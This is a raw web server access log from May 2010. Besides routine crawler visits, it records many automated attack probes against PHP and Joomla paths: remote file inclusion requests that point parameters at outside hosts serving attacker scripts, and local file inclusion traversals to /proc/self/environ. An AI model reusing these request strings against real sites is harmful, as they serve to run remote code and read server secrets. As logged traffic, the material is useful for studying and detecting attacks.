114.108.177.125 - - [23/May/2010:03:37:47 -0500] "GET /logs/errors.php?error=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:03:37:47 -0500] "GET /errors.php?error=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:03:37:48 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.195.239 - - [23/May/2010:03:39:32 -0500] "GET /logs/access_log.1187222400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.15.39.12 - - [23/May/2010:03:43:01 -0500] "HEAD /logs/ HTTP/1.1" 200 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:01 -0500] "GET /logs/ HTTP/1.1" 200 6654 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:54 -0500] "HEAD /logs/access_log.1270512000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:54 -0500] "HEAD /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:54 -0500] "HEAD /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:54 -0500] "HEAD /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:55 -0500] "HEAD /logs/access_log.1270857600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:55 -0500] "HEAD /logs/access_log.1270944000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:55 -0500] "HEAD /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:55 -0500] "HEAD /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:56 -0500] "HEAD /logs/access_log.1271203200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:59 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 206 497444 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:43:59 -0500] "HEAD /logs/access_log.1271289600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:02 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 206 669492 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:03 -0500] "HEAD /logs/access_log.1271376000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:08 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 206 664329 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:08 -0500] "HEAD /logs/access_log.1271462400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:15 -0500] "GET /logs/access_log.1271462400 HTTP/1.1" 206 716852 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:15 -0500] "HEAD /logs/access_log.1271548800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:17 -0500] "GET /logs/access_log.1271548800 HTTP/1.1" 206 576917 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:18 -0500] "HEAD /logs/access_log.1271635200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:21 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 206 643612 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:21 -0500] "HEAD /logs/access_log.1271721600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:25 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 206 586690 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:25 -0500] "HEAD /logs/access_log.1271808000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
80.65.166.74 - - [23/May/2010:03:44:28 -0500] "GET /logs///index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
80.65.166.74 - - [23/May/2010:03:44:28 -0500] "GET ///index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
204.15.39.12 - - [23/May/2010:03:44:29 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 206 676471 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:29 -0500] "HEAD /logs/access_log.1271894400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:32 -0500] "GET /logs/access_log.1271894400 HTTP/1.1" 206 656203 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:32 -0500] "HEAD /logs/access_log.1271980800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:35 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 206 667216 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:35 -0500] "HEAD /logs/access_log.1272067200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:37 -0500] "GET /logs/access_log.1272067200 HTTP/1.1" 206 534640 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:38 -0500] "HEAD /logs/access_log.1272153600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:40 -0500] "GET /logs/access_log.1272153600 HTTP/1.1" 206 577488 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:40 -0500] "HEAD /logs/access_log.1272240000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:42 -0500] "GET /logs/access_log.1272240000 HTTP/1.1" 206 478712 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:42 -0500] "HEAD /logs/access_log.1272326400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:44 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 206 499731 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:48 -0500] "HEAD /logs/access_log.1272412800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:51 -0500] "GET /logs/access_log.1272412800 HTTP/1.1" 206 576125 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:51 -0500] "HEAD /logs/access_log.1272499200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:53 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 206 478222 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:53 -0500] "HEAD /logs/access_log.1272585600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:55 -0500] "GET /logs/access_log.1272585600 HTTP/1.1" 206 433875 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:55 -0500] "HEAD /logs/access_log.1272672000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:58 -0500] "GET /logs/access_log.1272672000 HTTP/1.1" 206 502112 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:44:59 -0500] "HEAD /logs/access_log.1272758400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:01 -0500] "GET /logs/access_log.1272758400 HTTP/1.1" 206 390938 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:01 -0500] "HEAD /logs/access_log.1272931200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:03 -0500] "GET /logs/access_log.1272931200 HTTP/1.1" 206 456940 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:03 -0500] "HEAD /logs/access_log.1273017600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:05 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 206 462567 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:05 -0500] "HEAD /logs/access_log.1273104000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:07 -0500] "GET /logs/access_log.1273104000 HTTP/1.1" 206 379343 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:07 -0500] "HEAD /logs/access_log.1273190400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:09 -0500] "GET /logs/access_log.1273190400 HTTP/1.1" 206 467945 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:09 -0500] "HEAD /logs/access_log.1273276800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:11 -0500] "GET /logs/access_log.1273276800 HTTP/1.1" 206 512753 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:11 -0500] "HEAD /logs/access_log.1273363200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:13 -0500] "GET /logs/access_log.1273363200 HTTP/1.1" 206 338146 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:13 -0500] "HEAD /logs/access_log.1273449600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:16 -0500] "GET /logs/access_log.1273449600 HTTP/1.1" 206 596252 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:16 -0500] "HEAD /logs/access_log.1273536000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:18 -0500] "GET /logs/access_log.1273536000 HTTP/1.1" 206 503349 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:19 -0500] "HEAD /logs/access_log.1273622400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:21 -0500] "GET /logs/access_log.1273622400 HTTP/1.1" 206 446022 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:21 -0500] "HEAD /logs/access_log.1273708800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:24 -0500] "GET /logs/access_log.1273708800 HTTP/1.1" 206 633187 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:24 -0500] "HEAD /logs/access_log.1273795200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:27 -0500] "GET /logs/access_log.1273795200 HTTP/1.1" 206 533939 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:27 -0500] "HEAD /logs/access_log.1273881600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:29 -0500] "GET /logs/access_log.1273881600 HTTP/1.1" 206 410422 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:29 -0500] "HEAD /logs/access_log.1273968000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:31 -0500] "GET /logs/access_log.1273968000 HTTP/1.1" 206 528722 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:32 -0500] "HEAD /logs/access_log.1274054400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:35 -0500] "GET /logs/access_log.1274054400 HTTP/1.1" 206 663666 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:35 -0500] "HEAD /logs/access_log.1274140800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:39 -0500] "GET /logs/access_log.1274140800 HTTP/1.1" 206 678121 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:40 -0500] "HEAD /logs/access_log.1274227200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:43 -0500] "GET /logs/access_log.1274227200 HTTP/1.1" 206 767644 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:43 -0500] "HEAD /logs/access_log.1274313600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:45 -0500] "GET /logs/access_log.1274313600 HTTP/1.1" 206 707602 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:46 -0500] "HEAD /logs/access_log.1274400000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:48 -0500] "GET /logs/access_log.1274400000 HTTP/1.1" 206 601189 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:49 -0500] "HEAD /logs/access_log.1274486400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:52 -0500] "GET /logs/access_log.1274486400 HTTP/1.1" 206 938847 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:52 -0500] "HEAD /logs/access_log.1274572800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [23/May/2010:03:45:54 -0500] "GET /logs/access_log.1274572800 HTTP/1.1" 206 263786 "-""Botslist Botfinder (+http://www.botslist.ca)"
72.167.140.113 - - [23/May/2010:03:46:17 -0500] "GET //common/playing.php?commonpath=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:03:46:17 -0500] "GET /logs//common/playing.php?commonpath=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.834"
119.63.198.40 - - [23/May/2010:03:47:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [23/May/2010:03:48:10 -0500] "GET /tattoo/set3.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.53 - - [23/May/2010:03:52:33 -0500] "GET /logs/access_log.1260057600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.161.143 - - [23/May/2010:03:56:54 -0500] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
211.239.161.143 - - [23/May/2010:03:56:55 -0500] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
74.55.135.18 - - [23/May/2010:03:57:39 -0500] "GET /logs/index2.php?DoAction=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.55.135.18 - - [23/May/2010:03:57:39 -0500] "GET /index2.php?DoAction=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
74.55.135.18 - - [23/May/2010:03:57:39 -0500] "GET /logs/access_log.1271635200/index2.php?DoAction=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.55.135.18 - - [23/May/2010:03:57:39 -0500] "GET /logs/access_log.1266019200/index2.php?DoAction=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.96.218.85 - - [23/May/2010:03:58:05 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:03:58:05 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
211.115.111.115 - - [23/May/2010:03:58:13 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:03:58:13 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:03:58:13 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.162 - - [23/May/2010:03:58:14 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.76"
209.126.254.162 - - [23/May/2010:03:58:15 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
66.96.218.85 - - [23/May/2010:03:58:26 -0500] "GET /logs/!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:03:58:26 -0500] "GET /!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:03:59:31 -0500] "GET /!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
183.89.129.156 - - [23/May/2010:03:59:44 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
183.89.129.156 - - [23/May/2010:03:59:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
67.195.112.180 - - [23/May/2010:04:01:14 -0500] "GET /logs/access_log.1217203200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.88.4.141 - - [23/May/2010:04:02:25 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:02:25 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:02:25 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:03:44 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:03:45 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:03:45 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.111.176.132 - - [23/May/2010:04:05:09 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
89.111.176.132 - - [23/May/2010:04:05:09 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
81.167.65.30 - - [23/May/2010:04:05:15 -0500] "GET /logs/access_log.1271635200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:04:05:15 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:04:05:15 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:04:06:08 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:04:06:08 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:04:06:08 -0500] "GET /logs/access_log.1273363200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.thenews.co.in/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:22 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:22 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:37 -0500] "GET /logs/access_log.1271894400//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:37 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:37 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:04:12:42 -0500] "GET /logs/access_log.1271894400//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://law.re.kr/joomla/administrator/backups/fx29id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.96.218.85 - - [23/May/2010:04:12:53 -0500] "GET /logs/access_log.1271894400/!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:04:12:53 -0500] "GET /!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:04:12:53 -0500] "GET /logs/!lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.834"
72.55.146.200 - - [23/May/2010:04:14:47 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.55.146.200 - - [23/May/2010:04:14:47 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:04:17:17 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
137.118.32.10 - - [23/May/2010:04:18:04 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:04:18:04 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:04:18:06 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.44.228.84 - - [23/May/2010:04:23:12 -0500] "GET /playing.php/common/db.php?commonpath=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/access_log.1262649600/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/access_log.1272326400/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
